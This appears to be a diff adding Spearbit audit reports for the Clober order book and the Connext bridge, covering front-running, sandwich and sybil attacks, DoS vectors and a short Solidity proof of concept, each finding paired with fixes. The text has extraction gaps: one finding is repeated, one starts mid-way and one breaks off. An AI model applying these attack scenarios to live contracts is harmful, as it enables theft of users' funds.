3e9e6b16. Spearbit: Fixed. +5.5.21 Unchecked code blocks Severity: Gas Optimization Context: OrderBook.sol#L581-L582 OctopusHeap.sol#L242 SegmentedSegmentTree464.sol#L153-L174 OrderBook.sol#L351-L352 Description: The mentioned code blocks can be performed without native math overflow / underflow checks because they have been checked to be so, or the min / max range ensures it. Recommendation: Wrap the referenced blocks with unchecked {}. Clober: Fixed orderbook instance at PR 313 and SegmentedSegmentTree instance PR 36. Spearbit: Fixed. 27 +5.5.22 Unused Custom Error Severity: Gas Optimization Context: SegmentedSegmentTree464.sol#L30 Description: error TreeQueryIndexOrder(); is defined but unused. Recommendation: Remove the unused error. Clober: Deleted in commit 46a0b6b1. Spearbit: Fixed. 5.6 Informational +5.6.1 Markets with malicious tokens should not be interacted with Severity: Informational Context: MarketRouter.sol#L34 Description: The Clober protocol is permissionless and allows anyone to create an orderbook for any base token. These base tokens can be malicious and interacting with these markets can lead to loss of funds in several ways. 
5.6 Informational
+5.6.1 Markets with malicious tokens should not be interacted with
Severity: Informational
Context: MarketRouter.sol#L34
Description: The Clober protocol is permissionless and allows anyone to create an orderbook for any base token. These base tokens can be malicious, and interacting with such markets can lead to loss of funds in several ways. For example, a token with custom code or a callback to an arbitrary address on transfer can use the pending ETH that the victim supplied to the router and trade it for another coin. The victim will lose their ETH and then be charged a second time through their WETH approval of the router.
Recommendation: Users need to be aware that trading on a market with an unknown token can lead to loss of funds.
Clober: Acknowledged.
Spearbit: Acknowledged.
+5.6.2 Claim bounty of stale orders should be given to user instead of daoTreasury
Severity: Informational
Context: OrderBook.sol#L656-L662 OrderBook.sol#L667
Description: When an unclaimed stale order is being replaced, the claimBounty is sent to the DAO treasury. However, since the user is the one executing the claim on behalf of the stale order owner, and is paying the gas for it, the claimBounty should be sent to them instead.
Recommendation: Change the claimer from the treasury to the user.
Clober: Fixed in PR 347.
Spearbit: The issue is no longer applicable, because claims have been decoupled from the replacement of stale orders.
+5.6.3 Misleading comment on remainingRequestedRawAmount
Severity: Informational
Context: OrderBook.sol#L130-L133
Description: The comment says // always ceil, but remainingRequestedRawAmount is rounded down when the base/quote amounts are converted to the raw amount.
Recommendation: Consider applying the following change:
- // always ceil
+ // always floor
Clober: Fixed in commit 557ca41d.
Spearbit: Fixed.
+5.6.4 Potential DoS if quoteUnit and index to price functions are set to unreasonable values
Severity: Informational
Context: OrderBook.sol#L565
Description: There are some griefing and DoS (denial-of-service) attacks on markets that are created with bad quoteUnit values and pricing functions.
1. A market order uses _take to iterate over several price indices until the order is filled. An attacker can add a tiny amount of depth to many indices (prices), increasing the gas cost and, in the worst case, leading to out-of-gas transactions.
2. There can only be MAX_ORDER_SIZE (32768) different orders at a single price (index). Old orders are only replaced if the previous order at the index has been fully filled. A griefer, or a market maker trying to block their competition, can fill the entire order queue for a price. This requires 32768 * quoteUnit quote tokens.
Recommendation: To mitigate the first issue, the chosen index-to-price function should ensure that the price increase between two neighbouring price indices is not too small. The second issue can be mitigated, and made unprofitable, by choosing a quoteUnit large enough that 32768 * quoteUnit is of significant value.
Clober: The described cases will be covered in the documentation. Progress is tracked in clober-dex/core/issues/369.
Spearbit: Acknowledged.
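To make the second mitigation concrete, a rough worked example (the numbers are assumed for illustration and are not from the report): with a 6-decimal quote token and quoteUnit = 10**7 (10 tokens), filling a single price queue costs 32768 * 10 = 327,680 tokens, which makes the griefing attack expensive; with quoteUnit = 1, the same attack costs only 32768 base units (about 0.033 tokens) plus gas, i.e. it is essentially free.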
+5.6.5 Rounding rationale could be better clarified
Severity: Informational
Context: OrderBook.sol#L579-L582
Description: The rationale for rounding up/down would be easier to follow if tied to the expendInput option instead.
Recommendation:
// Rounds down if expendInput, rounds up if expendOutput
// Bid & expendInput => taking ask & expendInput => rounds down (user specified quote)
// Bid & expendOutput => taking ask & expendOutput => rounds up (user specified base)
// Ask & expendInput => taking bid & expendInput => rounds down (user specified base)
// Ask & expendOutput => taking bid & expendOutput => rounds up (user specified quote)
Clober: Also, the logic looks better when changed as below:
uint64 remainingRawAmount = isTakingBidSide == expendInput
    ? _baseToRaw(requestedAmount - filledAmount, currentIndex, !expendInput)
    : _quoteToRaw(requestedAmount - filledAmount, !expendInput);
Fixed in PR 313.
Spearbit: Fixed.
+5.6.6 Rename flashLoan() for better composability & ease of integration
Severity: Informational
Context: OrderBook.sol#L317
Description: For ease of third-party integration, consider renaming the function to flash(), as it would then have the same function signature as Uniswap V3, although the callback function would still be different.
Recommendation:
- flashLoan(
+ flash(
Clober: Fixed in PR 326.
Spearbit: Fixed.
+5.6.7 Unsupported tokens: tokens with more than 18 decimals
Severity: Informational
Context: OrderBook.sol#L102
Description: The orderbook does not currently support tokens with more than 18 decimals. However, having more than 18 decimals is very unusual.
Recommendation: Consider whether there are any non-standard tokens that you might want to support. As the protocol is permissionless, consider documenting that only standard tokens should be used as quote and base tokens, and that the protocol does not support non-standard tokens, such as tokens with more than 18 decimals, fee-on-transfer tokens, rebasing tokens, etc.
Clober: The described cases will be covered in the documentation. Progress is tracked in clober-dex/core/issues/369.
Spearbit: Acknowledged.
+5.6.8 ArithmeticPriceBook and GeometricPriceBook contracts should be abstract
Severity: Informational
Context: GeometricPriceBook.sol, ArithmeticPriceBook.sol
Description: The ArithmeticPriceBook and GeometricPriceBook contracts don't have any external functions.
Recommendation: Consider making these contracts abstract.
Clober: Fixed in commit 300b1986.
Spearbit: Fixed.
+5.6.9 childRawIndex in OctopusHeap.pop is not a raw index
Severity: Informational
Context: OctopusHeap.sol#L231
Description: The OctopusHeap uses raw and heap indices. Raw indices are 0-based (the root has raw index 0) and iterate the tree top to bottom, left to right. Heap indices are 1-based (the root has heap index 1) and iterate the head left to right, top to bottom, but then iterate the remaining nodes octopus arm by arm. A mapping between the raw index and the heap index can be obtained through _convertRawIndexToHeapIndex. The pop function defines a childRawIndex, but this variable is not a raw index; it is actually raw index + 1 (1-based).
Recommendation: The algorithm works correctly on the wrongly named variable, which makes it look confusing. Either rename the variable to childRawIndex1Based, or rewrite the algorithm to correctly use raw indices (preferred). Note that the leftChild(index) function is different for 0- and 1-based indices:
leftChild(index0Based) = 2 * index + 1
leftChild(index1Based) = 2 * index
function pop(Core storage core) internal {
    (uint8 rootWordIndex, uint8 rootBitIndex) = _root(core);
    uint256 mask = 1 << rootBitIndex;
    uint256 word = core.bitmap[rootWordIndex];
    if (word == mask) {
        uint256 head = core.heap[0];
        uint8 newLength = uint8(head - 1);
        if (newLength == 0) {
            core.heap[0] = _INIT_VALUE;
        } else {
            uint256 arm;
            uint8 wordIndex = _getWordIndex(core, _convertRawIndexToHeapIndex(newLength));
            uint16 heapIndex = 1;
-           uint16 childRawIndex = 2;
+           uint16 childRawIndex = 1; // left child of root
            uint16 bodyPartIndex;
            uint16 childHeapIndex = _getLeftChildHeapIndex(heapIndex);
-           while (childRawIndex <= newLength) {
+           while (childRawIndex < newLength) { // 0-based, so < instead of <=
                uint8 leftChildWordIndex = _getWordIndex(head, arm, childHeapIndex);
                uint8 rightChildWordIndex = _getWordIndex(head, arm, childHeapIndex + 1);
                if (leftChildWordIndex > wordIndex && rightChildWordIndex >= wordIndex) {
                    break;
                } else if (leftChildWordIndex > rightChildWordIndex) {
                    (head, arm) = _updateWordIndex(head, arm, heapIndex, rightChildWordIndex);
                    heapIndex = childHeapIndex + 1;
-                   childRawIndex = (childRawIndex + 1) << 1;
+                   childRawIndex = (childRawIndex << 1) + 3; // leftChild(childRawIndex + 1)
                } else {
                    (head, arm) = _updateWordIndex(head, arm, heapIndex, leftChildWordIndex);
                    heapIndex = childHeapIndex;
-                   childRawIndex <<= 1;
+                   childRawIndex = (childRawIndex << 1) + 1; // leftChild(childRawIndex)
                }
                childHeapIndex = _getLeftChildHeapIndex(heapIndex);
                if (childHeapIndex > _HEAD_SIZE && bodyPartIndex == 0) {
                    // child in arm
                    bodyPartIndex = childHeapIndex >> _HEAD_SIZE_M;
                    arm = core.heap[bodyPartIndex];
                }
            }
            (head, arm) = _updateWordIndex(head, arm, heapIndex, wordIndex);
            unchecked {
                if (uint8(head) == 0) {
                    core.heap[0] = head + 255; // decrement length by 1
                } else {
                    core.heap[0] = head - 1; // decrement length by 1
                }
            }
            if (bodyPartIndex > 0) {
                core.heap[bodyPartIndex] = arm;
            }
        }
    }
    core.bitmap[rootWordIndex] = word & (~mask);
}
Consider renaming _ROOT_INDEX to _ROOT_HEAP_INDEX to make it clearer what kind of index this variable is.
Clober: Fixed in PR 37.
Spearbit: Fixed. The recommendation was implemented, and _ROOT_INDEX has been renamed to _ROOT_HEAP_INDEX.
+5.6.10 Lack of orderIndex validation
Severity: Informational
Context: OrderNFT.sol#L271
Description: The orderIndex parameter in the OrderNFT contract is missing proper validation. Realistically the value should never exceed type(uint232).max, as it is passed from the OrderBook contract; however, future changes to the code might potentially cause encoding/decoding ambiguity.
Recommendation: Add proper validation:
require(orderIndex <= type(uint232).max);
Clober: Fixed in PR 353.
Spearbit: Verified. Validation added. By the end of the fixing stage the contract was refactored and the encoding/decoding functionality was moved to the OrderKey.sol library, keeping the same validation logic.
+5.6.11 Unsafe _getParentHeapIndex, _getLeftChildHeapIndex
Severity: Informational
Context: OctopusHeap.sol#L135 OctopusHeap.sol#L156 discussion
Description: When heapIndex = 1, _getParentHeapIndex(uint16 heapIndex) returns 0, which is an invalid heap index. When heapIndex = 45, _getLeftChildHeapIndex(uint16 heapIndex) returns 62, which is an invalid heap index.
Recommendation: None. The functions aren't called with these inputs.
Clober: It appears that this input is not intended to be used within the _getParentHeapIndex and _getLeftChildHeapIndex functions. Can we proceed without making any modifications?
Spearbit: Yes, the surrounding code guards against these values for _getParentHeapIndex. _getLeftChildHeapIndex could be called from pop with this value, but the while (childRawIndex <= newLength) loop would stop before the invalid heap index is used. Marked as acknowledged.
+5.6.12 _priceToIndex function implemented but unused
Severity: Informational
Context: ArithmeticPriceBook.sol#L23 GeometricPriceBook.sol#L74
Description: The _priceToIndex functions of the price books are implemented but unused.
Recommendation: Consider adding an external method to expose these functions, or change their visibility to public.
Clober: Due to the code size, it is impossible to make it public now. So we compromise by leaving this internal function in place and guiding users to extend this contract.
Spearbit: Acknowledged.
+5.6.13 Incorrect _MAX_NODES and _MAX_NODES_P descriptions
Severity: Informational
Context: SegmentedSegmentTree464.sol#L41-L42
Description: The derivation of the values _MAX_NODES and _MAX_NODES_P in the comments is incorrect. For _MAX_NODES, C * ((S * C) ** (L - 1)) = 4 * ((2 * 4) ** 3) = 2048 is missing the E; alternatively, replace S * C with N. The issue isn't entirely resolved by that either, as it then becomes C * ((S * C * E) ** (L - 1)) = 4 * ((2 * 4 * 2) ** 3) = 16384 = 2 ** 14. The same applies to _MAX_NODES_P.
Recommendation: The formulas should be updated.
Clober: Formulas updated in PR 39:
uint8 private constant _R = 2; // There are `2` root node groups
uint8 private constant _C = 4; // There are `4` children (each child is a node group of its own) for each node
uint256 private constant _N_P = 4; // C * P = 2 ** `4`
uint256 private constant _MAX_NODES = 2**15; // (R * P) * ((C * P) ** (L - 1)) = `32768`
uint256 private constant _MAX_NODES_P_MINUS_ONE = 14; // MAX_NODES / R = 2 ** `14`
Spearbit: Fixed. Some new definitions were introduced, and the math now checks out.
6 Appendix: Issues raised by Clober
+6.0.1 marketOrder() with expendOutput reverts with SlippageError with max tolerance
Severity: High Risk
Context: https://github.com/clober-dex/core/issues/332
Description: The Clober team raised this issue during the audit. It is added here to track the fixes.
Recommendation:
Clober: Fixed in commit fdf90626.
Spearbit: Fixed. The taker fee is now only accounted for once at the end of the function, instead of at each price index.
+6.0.2 Wrong OrderIndex could be emitted at Claim() event.
Severity: Low Risk
Context: https://github.com/clober-dex/core/issues/354
Description: The Clober team raised this issue during the audit. It is added here to track the fixes.
Recommendation:
Clober: Fixed in PR 352.
Spearbit: Fixed. claim and _cancel now also check the validity of order indexes.
diff --git a/findings_newupdate/spearbit/Connext-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Connext-Spearbit-Security-Review.txt
new file mode 100644
index 0000000..8c1e2c5
--- /dev/null
+++ b/findings_newupdate/spearbit/Connext-Spearbit-Security-Review.txt
@@ -0,0 +1,75 @@
+5.1.1 Lack of transferId Verification Allows an Attacker to Front-Run Bridge Transfers
Severity: Critical Risk
Context: NomadFacet.sol#L99-L149, BridgeRouter.sol#L176-L199, BridgeRouter.sol#L347-L381
Description: The onReceive() function does not verify the integrity of transferId against all other parameters. Although the onlyBridgeRouter modifier on the onReceive() function checks that the call originates from another BridgeRouter (assuming a correct configuration of the whitelist), it does not check that the call originates from another Connext Diamond. This allows anyone to send arbitrary data to BridgeRouter.sendToHook(), which is later interpreted as the transferId on Connext’s NomadFacet.sol contract. This can be abused in a front-running attack, as described in the following scenario:
• Alice is a bridge user and makes an honest call to transfer funds over to the destination chain.
• Bob does not make a transfer, but instead calls the sendToHook() function with the same _extraData while passing an _amount of 1 wei.
• Both Alice and Bob have their tokens debited on the source chain and must wait for the Nomad protocol to optimistically verify the incoming TransferToHook messages.
• Once the messages have been replicated onto the destination chain, Bob processes the message before Alice, causing onReceive() to be called on the same transferId.
• However, because _amount is not verified against the transferId, Alice receives significantly fewer tokens, and the s.reconciledTransfers mapping marks the transfer as reconciled. Hence, Alice has effectively lost all her tokens during an attempt to bridge them.
function onReceive(
    uint32, // _origin, not used
    uint32, // _tokenDomain, not used
    bytes32, // _tokenAddress, of canonical token, not used
    address _localToken,
    uint256 _amount,
    bytes memory _extraData
) external onlyBridgeRouter {
    bytes32 transferId = bytes32(_extraData);
    // Ensure the transaction has not already been handled (i.e. previously reconciled).
    if (s.reconciledTransfers[transferId]) {
        revert NomadFacet__reconcile_alreadyReconciled();
    }
    // Mark the transfer as reconciled.
    s.reconciledTransfers[transferId] = true;
Note: the same issue exists with _localToken. As a result, a malicious user could perform the same attack by using a malicious token contract and transferring the same amount of tokens in the call to sendToHook().
Recommendation: Verify that the call originates from the Connext Diamond on the originator chain. In the reconcile() function, verify that transferId is indeed a hash of the other parameters.
Connext: Solved in PR 1630 and PR 1678.
Spearbit: Note: The BridgeRouter and its interface changed quite a lot during and after this audit. As it was out of scope for this audit, it is important to conduct a separate review of that particular code, including the interface to Connext.
Connext: An extra audit for BridgeRouter is underway.
Spearbit: Acknowledged.
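A minimal sketch of the second recommendation, binding the transfer parameters to the transferId on the destination chain; the field set and the error name are illustrative assumptions, not Connext's actual struct:
// Sketch only: recompute the id from the received parameters and compare.
bytes32 expectedId = keccak256(abi.encode(_origin, _localToken, _amount, nonce, callParams)); // nonce/callParams assumed
if (expectedId != transferId) {
    revert NomadFacet__reconcile_invalidTransferId(); // hypothetical error
}
With such a check, an attacker who replays the same _extraData with an _amount of 1 wei produces a different hash and the spoofed message is rejected.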
+5.1.2 Use of spot dex price when repaying portal debt leads to sandwich attacks
Severity: Critical Risk
Context: NomadFacet.sol#L286-L290 NomadFacet.sol#L204-L209
Description: When the NomadFacet repays the portal debt, it has to convert local assets into adopted assets. It first calculates how many assets it needs to swap and then converts the local assets into the adopted assets.
function _reconcileProcessPortal(
    bytes32 _canonicalId,
    uint256 _amount,
    address _local,
    bytes32 _transferId
) private returns (uint256) {
    // Calculates the amount to be repaid to the portal in adopted asset
    (uint256 totalRepayAmount, uint256 backUnbackedAmount, uint256 portalFee) = _calculatePortalRepayment(
        _canonicalId,
        _amount,
        _transferId,
        _local
    );
    ...
    // @audit totalRepayAmount is dependent on the AMM spot price. The swap will not hit the slippage
    (bool swapSuccess, uint256 amountIn, address adopted) = AssetLogic.swapFromLocalAssetIfNeededForExactOut(
        _canonicalId,
        _local,
        totalRepayAmount,
        _amount
    );

function _calculatePortalRepayment(
    bytes32 _canonicalId,
    uint256 _localAmount,
    bytes32 _transferId,
    address _local
) internal returns (uint256, uint256, uint256) {
    // @audit A manipulated spot price might be used. availableAmount might be extremely small
    (uint256 availableAmount, address adopted) = AssetLogic.calculateSwapFromLocalAssetIfNeeded(
        _canonicalId,
        _local,
        _localAmount
    );
    // @audit If there aren't enough funds to repay, the protocol absorbs all the slippage
    if (totalRepayAmount > availableAmount) {
        ...
        backUnbackedAmount = availableAmount;
        portalFee = 0;
        ...
        totalRepayAmount = backUnbackedAmount + portalFee;
        ...
    }
    return (totalRepayAmount, backUnbackedAmount, portalFee);
}
The _calculatePortalRepayment function calculates the debt to be repaid, totalRepayAmount. It also calculates the post-swap amount, availableAmount. If the post-swap amount is enough to pay the outlying debt, totalRepayAmount equals the outlying debt. If not, it equals availableAmount. Since totalRepayAmount is never larger than the post-swap amount availableAmount, which is derived from the AMM price, the swap will not hit the slippage limit even if the price is off. Assume the price is manipulated to 1:100: availableAmount and totalRepayAmount would both approximate _amount / 100, and the swap will not hit the slippage limit, as _amount can be converted into _amount / 100 in this case. Exploiters can manipulate the DEX and launch a sandwich attack on every repayment. This can also be done on different chains, making the attackers millions in potential profit.
Connext: We have decided to lean on the policy that Aave portals will not be automatically repaid. Adding the automatic repayment of portals adds complexity to the core codebase and leads to issues. Even with the portal repayment in place, issues such as a watcher disconnecting the xapp for an extended period mean we have to support out-of-band repayments regardless. By leaning on this as the only method of repayment, we are able to reduce the code complexity on reconcile. Furthermore, it does not substantially reduce trust. Aave portals essentially amount to an unsecured credit line, usable by bridges. If the automatic repayment fails for any reason (i.e. due to bad pricing in the AMM), then the LP associated with the loan must be responsible for closing out the position in a trusted way. Solved in PR 1585 by removing this code.
Spearbit: Verified.
However, this function is not called from swapOut(). Note: the same issue exists in swapInternalOut(), which is called from swapFromLocalAssetIfNeededForEx- actOut() via _swapAssetOut(). However, via this route it is not possible to specify arbitrary token indexes. There- fore, there isn’t an immediate risk here. 7 contract StableSwapFacet is BaseConnextFacet { ... function swapExactOut(... ,address assetIn, address assetOut, ... ) ... { return s.swapStorages[canonicalId].swapOut( getSwapTokenIndex(canonicalId, assetIn), getSwapTokenIndex(canonicalId, assetOut), amountOut, maxAmountIn // assetIn could be same as assetOut ); } ... } library SwapUtils { function swapOut(..., uint8 tokenIndexFrom, uint8 tokenIndexTo, ... ) ... { ... uint256[] memory balances = self.balances; ... self.balances[tokenIndexFrom] = balances[tokenIndexFrom].add(dx).sub(dxAdminFee); self.balances[tokenIndexTo] = balances[tokenIndexTo].sub(dy); // overwrites previous update if ,! From==To ... } function getY(..., uint8 tokenIndexFrom, uint8 tokenIndexTo, ... ) ... { ... require(tokenIndexFrom != tokenIndexTo, "compare token to itself"); // here is the protection ... } } Below is a proof of concept which shows that the balances of index 3 can be arbitrarily reduced. //SPDX-License-Identifier: MIT pragma solidity 0.8.14; import "hardhat/console.sol"; contract test { uint[] balances = new uint[](10); function swap(uint8 tokenIndexFrom,uint8 tokenIndexTo,uint dx) public { uint dy=dx; // simplified uint256[] memory mbalances = balances; balances[tokenIndexFrom] = mbalances[tokenIndexFrom] + dx; balances[tokenIndexTo] = mbalances[tokenIndexTo] - dy; } constructor() { balances[3] = 100; swap(3,3,10); console.log(balances[3]); // 90 } } Recommendation: Add the following to swapExactOut() and swapInternalOut(): require(tokenIndexFrom != tokenIndexTo, "compare token to itself"); Connext: Solved in PR 1528. Spearbit: Verified. 8 +5.1.4 Use of spot price in SponsorVault leads to sandwich attack. Severity: Critical Risk Context: SponsorVault.sol#L208 Description: There is a special role sponsor in the protocol. Sponsors can cover the liquidity fee and transfer fee for users, making it more favorable for users to migrate to the new chain. Sponsors can either provide liquidity for each adopted token or provide the native token in the SponsorVault. If the native token is provided, the SponsorVault will swap to the adopted token before transferring it to users. contract SponsorVault is ISponsorVault, ReentrancyGuard, Ownable { ... function reimburseLiquidityFees( address _token, uint256 _liquidityFee, address _receiver ) external override onlyConnext returns (uint256) { ... uint256 amountIn = tokenExchange.getInGivenExpectedOut(_token, _liquidityFee); amountIn = currentBalance >= amountIn ? amountIn : currentBalance; // sponsored fee may end being less than _liquidityFee due to slippage sponsoredFee = tokenExchange.swapExactIn{value: amountIn}(_token, msg.sender); ... } } The spot AMM price is used when doing the swap. Attackers can manipulate the value of getInGivenExpectedOut and make SponsorVault sell the native token at a bad price. By executing a sandwich attack the exploiters can drain all native tokens in the sponsor vault. For the sake of the following example, assume that _token is USDC and native token is ETH, the sponsor tries to sponsor 100 usdc to the users: • Attacker first manipulates the DEX and makes the exchange of 1 ETH = 0.1 USDC. • getInGivenExpectedOut returns 100 / 0.1 = 1000. 
5.2 High Risk
+5.2.1 Configuration is crucial (both Nomad and Connext)
Severity: High Risk
Context: BridgeFacet.sol#L231-L238, BridgeFacet.sol#L257-L265, BridgeFacet.sol#L271-L276, Router.sol#L37-L39, XAppConnectionManager.sol#L106-L108, XAppConnectionManager.sol#L115-L125
Description: The Connext and Nomad protocols rely heavily on configuration parameters. These parameters are configured at deployment time and are updated afterwards. Configuration errors can have major consequences. Examples of important configurations are:
• BridgeFacet.sol: s.promiseRouter.
• BridgeFacet.sol: s.connextions.
• BridgeFacet.sol: s.approvedSequencers.
• Router.sol: remotes[].
• xAppConnectionManager.sol: home.
• xAppConnectionManager.sol: replicaToDomain[].
• xAppConnectionManager.sol: domainToReplica[].
Recommendation: Have rigorous controls when configuring and updating these values.
+5.2.2 Deriving price with balanceOf is dangerous
Severity: High Risk
Context: ConnextPriceOracle.sol#L109-L135
Description: getPriceFromDex derives the price by querying the balances of the AMM's pools.
function getPriceFromDex(address _tokenAddress) public view returns (uint256) {
    PriceInfo storage priceInfo = priceRecords[_tokenAddress];
    ...
    uint256 rawTokenAmount = IERC20Extended(priceInfo.token).balanceOf(priceInfo.lpToken);
    ...
    uint256 rawBaseTokenAmount = IERC20Extended(priceInfo.baseToken).balanceOf(priceInfo.lpToken);
    ...
}
Deriving the price with balanceOf is dangerous, as balanceOf can be gamed. Consider Uniswap v2 as an example: exploiters can first send tokens into the pool to pump the price, then absorb the previously donated tokens by calling mint.
Recommendation: Consider querying the DEX's state through function calls such as Uniswap v2's getReserves(), which returns the correct state of the pool.
Connext: Solved in PR 1649.
Spearbit: Verified.
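A minimal sketch of the getReserves()-based approach for a Uniswap-v2-style pair (decimal normalization is omitted, and the surrounding PriceInfo fields are taken from the snippet above):
// Sketch only: read synced reserves instead of raw balances, so donated
// tokens that have not been minted/synced into the pool cannot skew the quote.
(uint112 reserve0, uint112 reserve1, ) = IUniswapV2Pair(priceInfo.lpToken).getReserves();
(uint256 tokenReserve, uint256 baseTokenReserve) =
    IUniswapV2Pair(priceInfo.lpToken).token0() == priceInfo.token
        ? (uint256(reserve0), uint256(reserve1))
        : (uint256(reserve1), uint256(reserve0));
uint256 rawPrice = (baseTokenReserve * 1e18) / tokenReserve; // base tokens per token, 1e18 scale
Note that even reserve-based spot prices remain manipulable within a transaction via swaps; getReserves() only removes the cheap donation vector, so a TWAP or external oracle is still preferable for pricing.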
+5.2.3 Routers can sybil attack the sponsor vault to drain funds
Severity: High Risk
Context: BridgeFacet.sol#L652-L688
Description: When funds are bridged from the source to the destination chain, messages must first go through optimistic verification before being executed on the destination BridgeFacet.sol contract. Upon transfer processing, the contract checks whether the domain is sponsored. If so, the user is reimbursed both for the liquidity fees paid when the transfer was initiated and for the fees paid to the relayer during message propagation. There currently isn't any mechanism to detect sybil attacks. Therefore, a router can perform several large-value transfers in an effort to drain the sponsor vault of its funds. Because liquidity fees are paid to the router by a user connected to the router, there isn't any value lost in this type of attack.
Recommendation: Consider re-thinking the sponsor vault design, or it may be safer to have it removed altogether.
Connext: Cap implemented in PR 1631. There is no total mitigation of sybil attacks on the vault possible, and this should be clearly explained to anyone who decides to deploy and fund one.
Spearbit: Verified and acknowledged.
+5.2.4 Routers are exposed to extreme slippage if they attempt to repay debt before being reconciled
Severity: High Risk
Context: NomadFacet.sol#L188-L209, NomadFacet.sol#L269-L320, AssetLogic.sol#L228-L250, AssetLogic.sol#L308-L362
Description: When routers are reconciled, the local asset may need to be exchanged for the adopted asset in order to repay the unbacked Aave loan. AssetLogic.swapFromLocalAssetIfNeededForExactOut() takes two key arguments:
• _amount, representing exactly how much of the adopted asset should be received.
• _maxIn, which is used to limit slippage and to limit how much of the local asset is used in the swap.
Upon failure to swap, the protocol resets the values for the unbacked Aave debt and distributes local tokens to the router. However, if the router partially paid off some of the unbacked Aave debt before being reconciled, _maxIn will diverge from _amount, allowing value to be extracted in the form of slippage. As a result, routers may receive less than the amount of liquidity they initially provided, leading to router insolvency.
Recommendation: Instead of using _amount to represent _maxIn, consider using some sort of user slippage amount. Alternatively, it may be easier/safer to restrict who can use Aave unbacked debt, as there is a lot of added complexity in integrating unbacked debt into the protocol.
Connext: Solved in PR 1585.
Spearbit: Verified.
+5.2.5 Malicious call data can DOS execute
Severity: High Risk
Context: Executor.sol#L142-L243
Description: An attacker can DOS the executor contract by giving infinite allowance to normal users. Since the executor increases the allowance before triggering the external call, the transaction will always revert if the allowance is already infinite.
function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) {
    ...
    if (!isNative && hasValue) {
        SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); // reverts if set to `infinite` before
    }
    ...
    (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(...); // can set allowance to `infinite`
    ...
}
Recommendation: Set the allowance to 0 before using safeIncreaseAllowance.
Note: also see issue "Not always safeApprove(..., 0)".
Connext: Solved in PR 1550.
Spearbit: Verified.
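A minimal sketch of the recommended pattern, using OpenZeppelin's SafeERC20 (the surrounding variable names are taken from the snippet above):
// Sketch only: clear any stale allowance first, so a pre-existing infinite
// allowance cannot make the subsequent increase revert.
uint256 current = IERC20(_args.assetId).allowance(address(this), _args.to);
if (current != 0) {
    SafeERC20.safeApprove(IERC20(_args.assetId), _args.to, 0); // resetting to zero is always permitted
}
SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount);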
+5.2.6 DOS attack on the Nomad Home.sol Contract
Severity: High Risk
Context: Home.sol#L332, Queue.sol#L119-L130
Description: Upon calling xcall(), a message is dispatched via Nomad. A hash of this message is inserted into the merkle tree and the new root is added at the end of the queue. Whenever the updater of Home.sol commits to a new root, improperUpdate() checks that the new update is not fraudulent. In doing so, it must iterate through the queue of merkle roots to find the correct committed root. Because anyone can dispatch a message and insert a new root into the queue, it is possible to impact the availability of the protocol by preventing honest messages from being included in the updated root.
function improperUpdate(..., bytes32 _newRoot, ...) public notFailed returns (bool) {
    ...
    // if the _newRoot is not currently contained in the queue,
    // slash the Updater and set the contract to FAILED state
    if (!queue.contains(_newRoot)) {
        _fail();
        ...
    }
    ...
}

function contains(Queue storage _q, bytes32 _item) internal view returns (bool) {
    for (uint256 i = _q.first; i <= _q.last; i++) {
        if (_q.queue[i] == _item) {
            return true;
        }
    }
    return false;
}
Recommendation: Consider altering the queuing system such that improperUpdate() takes in an index argument that is greater than the old root. By specifying the index, it can be checked that the new root is valid in O(1) time instead of O(n) time. Alternatively, it may be better to remove the queuing system altogether.
Connext: This is discussed in the Nomad Quantstamp audit report, and will be addressed by removing the queue for messaging in a future upgrade. Going to leave this issue open, though we will note that this attack is costly to perform and (currently) exists within the Nomad protocol.
Spearbit: Acknowledged.
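A minimal sketch of the O(1) membership check from the recommendation, where the caller supplies the expected position; this is illustrative only, and a full design must also ensure that supplying a wrong index for a root that is actually present cannot be abused:
// Sketch only: one storage read replaces the linear scan in contains().
function containsAt(Queue storage _q, bytes32 _item, uint256 _index) internal view returns (bool) {
    return _index >= _q.first && _index <= _q.last && _q.queue[_index] == _item;
}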
+5.2.7 Upon failing to back unbacked debt _reconcileProcessPortal() will leave the converted asset in the contract
Severity: High Risk
Context: NomadFacet.sol#L225-L242
Description: When routers front liquidity for the protocol's users, they are later reconciled once the bridge has optimistically verified transfers from the source chain. Upon being reconciled, _reconcileProcessPortal() attempts to first pay back the Aave debt before distributing the rest back to the router. However, _reconcileProcessPortal() will not convert the adopted asset back to the local asset in the case where the call to the Aave pool fails. Instead, the function sets amountIn = 0 and continues to distribute the local asset to the router.
if (success) {
    emit AavePortalRepayment(_transferId, adopted, backUnbackedAmount, portalFee);
} else {
    // Reset values
    s.portalDebt[_transferId] += backUnbackedAmount;
    s.portalFeeDebt[_transferId] += portalFee;
    // Decrease the allowance
    SafeERC20.safeDecreaseAllowance(IERC20(adopted), s.aavePool, totalRepayAmount);
    // Update the amount repaid to 0, so the amount is credited to the router
    amountIn = 0;
    emit AavePortalRepaymentDebt(_transferId, adopted, s.portalDebt[_transferId], s.portalFeeDebt[_transferId]);
}
Recommendation: It might be useful to convert the adopted asset amount back to the local asset, so that subsequent swaps do not fail due to an insufficient amount of the local asset. Alternatively, if the attempt to back unbacked debt fails, consider transferring the adopted asset out to the liquidity provider so they can handle this themselves.
Connext: We have decided to lean on the policy that Aave portals will not be automatically repaid. Adding the automatic repayment of portals adds complexity to the core codebase and leads to issues. Even with the portal repayment in place, issues such as a watcher disconnecting the xapp for an extended period mean we have to support out-of-band repayments regardless. By leaning on this as the only method of repayment, we are able to reduce the code complexity on reconcile. Furthermore, it does not substantially reduce trust. Aave portals essentially amount to an unsecured credit line, usable by bridges. If the automatic repayment fails for any reason (i.e. due to bad pricing in the AMM), then the LP associated with the loan must be responsible for closing out the position in a trusted way. Solved in PR 1585 by removing this code.
Spearbit: Verified.
+5.2.8 _handleExecuteTransaction() doesn’t handle native assets correctly
Severity: High Risk
Context: BridgeFacet.sol#L644-L718, Executor.sol#L142-L243
Description: The function _handleExecuteTransaction() sends any native tokens to the executor contract first, and then calls s.executor.execute(). This means that within that function msg.value will always be 0, so the associated logic that uses msg.value doesn't work as expected and the function doesn't handle native assets correctly.
Note: also see issue "Executor reverts on receiving native tokens from BridgeFacet".
contract BridgeFacet is BaseConnextFacet {
    function _handleExecuteTransaction(...) ... {
        ...
        AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount);
